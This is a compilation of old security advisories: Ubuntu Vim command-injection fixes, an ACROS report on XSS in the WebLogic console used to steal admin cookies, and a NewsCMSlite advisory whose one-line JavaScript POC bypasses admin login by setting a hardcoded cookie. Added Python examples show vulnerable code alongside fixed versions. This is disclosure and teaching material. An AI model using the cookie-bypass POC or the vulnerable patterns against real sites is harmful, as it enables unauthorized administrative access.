  vim          1:7.1-056+2ubuntu2.1
  vim-runtime  1:7.1-056+2ubuntu2.1

Ubuntu 8.04 LTS:
  vim          1:7.1-138+1ubuntu3.1
  vim-runtime  1:7.1-138+1ubuntu3.1

Ubuntu 8.10:
  vim          1:7.1.314-3ubuntu3.1
  vim-runtime  1:7.1.314-3ubuntu3.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Jan Minar discovered that Vim did not properly sanitize inputs before invoking the execute or system functions inside Vim scripts. If a user were tricked into running Vim scripts with a specially crafted input, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2712)

Ben Schmidt discovered that Vim did not properly escape characters when performing keyword or tag lookups. If a user were tricked into running specially crafted commands, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4101)

Updated packages for Ubuntu 6.06 LTS:

(Source archive and binary package URLs with sizes and MD5 checksums omitted.)
ACROS Security: HTML Injection in BEA (Oracle) WebLogic Server Console (ASPR #2009-01-27-1)
=[BEGIN-ACROS-REPORT]=

PUBLIC

=========================================================================
ACROS Security Problem Report #2009-01-27-1
-------------------------------------------------------------------------
ASPR #2009-01-27-1: HTML Injection in BEA WebLogic Server Console
=========================================================================

Document ID: ASPR #2009-01-27-1-PUB
Vendor: ORACLE (http://www.oracle.com)
Target: Oracle WebLogic Server 10.0
Impact: There is an HTML Injection vulnerability in WebLogic Server 10
        Administration Console that allows the attacker to gain
        administrative access to the server.
Severity: High
Status: Official patch available, workarounds available
Discovered by: Sasa Kos of ACROS Security

Current version: http://www.acrossecurity.com/aspr/ASPR-2009-01-27-1-PUB.txt

Summary
=======

There is an HTML Injection vulnerability in WebLogic Server 10 Administration Console that allows the attacker to gain administrative access to the server. It is possible to craft a URL that, when requested from the server, returns a document with arbitrarily chosen HTML injected into it. An obvious use for this type of vulnerability is cross-site scripting, which can be used, among other things, to obtain session cookies from WebLogic administrators. These cookies, when stolen, provide the attacker with administrative access to the WebLogic Administration Console, compromising the security of the entire web server.

This vulnerability is exploitable even if the Administration Console is only being accessed via HTTPS, and even if the Administrative Port is enabled.

Product Coverage
================

- WebLogic Server 10.0

Note: Our tests were only performed on the above product version. Other versions may or may not be affected.

Analysis
========

One of the URL arguments in the WebLogic Server 10 Administration Console is not properly sanitized against HTML injection, which allows the attacker to introduce additional, malicious HTML into the server's response. The most common type of HTML injection is injection of malicious client-side script, commonly known as cross-site scripting.

In an actual attack the user would not be required to open URLs specified by the attacker. Instead, a malicious web page visited by the logged-in WebLogic administrator would mount the entire attack automatically and covertly. For instance, a tiny 0x0 pixel iframe could be used to load the URL from the demonstration immediately upon the administrator's visit to the malicious page, injecting the malicious script into the WebLogic server's response. This malicious script would then silently send the administrator's session cookies to the attacker's server, where she could pick them up and use them to enter the administrator's session in the Administration Console.

Mitigating Factors
==================

- In order to execute the above attack, the attacker would need to make the administrator's browser visit a malicious web page while the administrator is logged into the Administration Console. This can be achieved using social engineering, network traffic modification or a combination of both.

- If the attacker manages to obtain a valid ADMINCONSOLESESSION cookie (and optionally the _WL_AUTHCOOKIE_ADMINCONSOLESESSION cookie), these will only be useful until the administrator logs out of the Administration Console. However, an attacker who knows that might rush to create a new administrative user in the console and use that user for WebLogic administration after the legitimate administrator has logged off.

Solution
========

ORACLE has issued a security bulletin [1] and published a patch which fixes this issue.

Workaround
==========

- WebLogic administrators can be trained not to browse other web pages while logged in to the Administration Console. However, since some hyperlinks in the console point to servers on the Internet (e.g., http://support.bea.com), the attacker could watch the administrator's Internet traffic and treat such requests as a strong sign that the administrator is currently logged in to the Administration Console. She would then slightly modify the Internet server's response so as to include the malicious code. Such an attack could only be mounted by attackers capable of monitoring and modifying the administrator's Internet traffic (most likely an ISP or someone who broke into an ISP).

- The WebLogic Administration Console can be disabled, which would neutralize this vulnerability.

References
==========

[1] Oracle Critical Patch Update Advisory - January 2009
    http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

Acknowledgments
===============

We would like to acknowledge BEA Systems and Oracle Corporation for professional handling of the identified vulnerability.

Contact
=======

ACROS d.o.o.
Makedon
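The reflection bug class described in the advisory, as an added illustration that is not WebLogic's code: a page that places a URL argument into its HTML unchanged, the same page with the argument HTML-encoded, and a check that reports tags the page itself never emits. The argument name "name", the page template and the sample value are all assumptions.

```python
import html
from html.parser import HTMLParser
from typing import Iterable, Mapping

# Constructed page layout; the argument name "name" is hypothetical and
# stands in for the unnamed console argument from the advisory.
TEMPLATE = "<html><body><h1>Server: {}</h1></body></html>"
PAGE_TAGS = {"html", "body", "h1"}


def render_unsafe(params: Mapping[str, str]) -> str:
    """Vulnerable form: the raw argument lands in the markup unchanged."""
    return TEMPLATE.format(params.get("name", ""))


def render_safe(params: Mapping[str, str]) -> str:
    """Hardened form: HTML-encode the argument before it touches the markup."""
    return TEMPLATE.format(html.escape(params.get("name", ""), quote=True))


class _TagCollector(HTMLParser):
    """Collects every start tag the browser would see in the response."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: set[str] = set()

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.add(tag)


def injected_tags(document: str, allowed: Iterable[str] = PAGE_TAGS) -> set[str]:
    """Tags present in the response that the page itself never emits."""
    collector = _TagCollector()
    collector.feed(document)
    return collector.tags - set(allowed)


# Constructed sample request: an argument value that carries markup.
SAMPLE = {"name": "<script>probe()</script>"}

if __name__ == "__main__":
    print(injected_tags(render_unsafe(SAMPLE)))  # {'script'}
    print(injected_tags(render_safe(SAMPLE)))    # set()
```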
NewsCMSlite Insecure Cookie Handling
############################ www.BugReport.ir ############################
#
# AmnPardaz Security Research Team
#
# Title: NewsCMSlite
# Vendor: http://www.katywhitton.com
# Bug: Insecure Cookie Handling
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_62.htm
#########################################################################

- Description:

NewsCMSlite is an easy way to get regularly updated content onto your site without the need for programming skills or employing a Web Maintenance engineer. The system allows you to update your news, articles, diary etc. dynamically, using an Access Database to store the content.

- Vulnerability:

+--> Insecure Cookie Handling

Because of improper access restriction to the administration section, it is possible to bypass the authentication mechanism and gain access to the administration section by setting the "loggedIn" cookie to "xY1zZoPQ".

Code Snippet: /newsadmin.asp, lines 73-101

    if pageView="login" THEN
        ' Nothing
    ELSE
        if (Request.Cookies("loggedIn")="") OR (Request.Cookies("loggedIn")<>"xY1zZoPQ") THEN
    %>
    . . .
    <%
        ELSE
    %>
    <%
        if pageView="" THEN
            ' The User is logged in with permission
            ' to view the admin section so we
            ' display the article list and
            ' options menu

- POC:

javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/"

- Solution:

Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized.

- Credit: AmnPardaz Security Research & Penetration Testing Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
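The check above, and a sound replacement for it, as an added example that is not the product's code: the vulnerable version trusts a fixed string in a cookie the client controls, while the hardened version keeps login state on the server and lets the cookie carry only an unguessable session id. The in-memory session store, the "password_ok" parameter and the sample cookies are assumptions; "loggedIn" and "xY1zZoPQ" are the values from the advisory.

```python
import secrets
from typing import Mapping, Optional

# Fixed token from the advisory: anyone who reads the source knows it,
# and any browser can set the cookie to it.
STATIC_TOKEN = "xY1zZoPQ"


def is_admin_static(cookies: Mapping[str, str]) -> bool:
    """Mirrors the vulnerable newsadmin.asp check (constructed, not the product's code)."""
    return cookies.get("loggedIn", "") == STATIC_TOKEN


class SessionStore:
    """Server-side sessions: the cookie carries only a random id that the
    server issued after a successful login and can revoke on logout."""

    def __init__(self) -> None:
        # Hypothetical in-memory store: session id -> username.
        self._sessions: dict[str, str] = {}

    def login(self, username: str, password_ok: bool) -> Optional[str]:
        """Issue a 256-bit random id only once the credential check passed
        (password verification itself is out of scope and stubbed as a bool)."""
        if not password_ok:
            return None
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = username
        return sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)

    def is_admin(self, cookies: Mapping[str, str]) -> bool:
        """A cookie is accepted only if the server itself issued the id."""
        return cookies.get("loggedIn", "") in self._sessions


if __name__ == "__main__":
    # Constructed forged cookie, as in the advisory's POC.
    forged = {"loggedIn": STATIC_TOKEN}
    store = SessionStore()
    print(is_admin_static(forged))   # True: the static check is bypassed
    print(store.is_admin(forged))    # False: no such session was issued
```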
Re: FUD Forum < 2.7.1 PHP code injection vulnerability
It's a very old one, and it was fixed at the time of reporting to one of the devs.